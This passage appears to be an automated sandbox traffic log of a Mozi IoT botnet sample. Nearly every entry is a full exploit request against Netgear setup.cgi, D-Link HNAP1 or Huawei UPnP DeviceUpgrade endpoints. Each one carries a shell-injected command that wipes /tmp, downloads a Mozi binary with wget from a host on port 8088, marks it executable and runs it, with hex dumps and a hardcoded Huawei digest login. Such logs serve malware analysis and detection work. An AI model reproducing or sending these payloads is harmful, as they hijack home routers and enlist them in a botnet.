                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 79.205.134.177:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 1.85.100.98:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 201.239.180.49:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 129.224.247.20:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 143.151.72.28:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.157.2.214:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 75.246.37.123:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 195.102.149.63:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
